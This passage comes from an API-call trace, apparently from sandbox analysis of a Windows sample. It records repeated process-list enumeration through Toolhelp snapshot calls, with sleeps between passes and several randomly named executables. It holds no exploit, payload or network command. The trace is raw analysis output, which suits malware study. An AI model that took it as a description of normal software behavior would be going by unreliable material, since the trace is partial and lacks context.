lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0111.170] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0111.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.183] CloseHandle (hObject=0xc4) returned 1 [0111.183] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.189] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.244] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.252] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0111.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.260] CloseHandle (hObject=0xbc) returned 1 [0111.260] Sleep (dwMilliseconds=0x12c) [0111.596] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.602] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.604] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.605] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.606] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.607] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 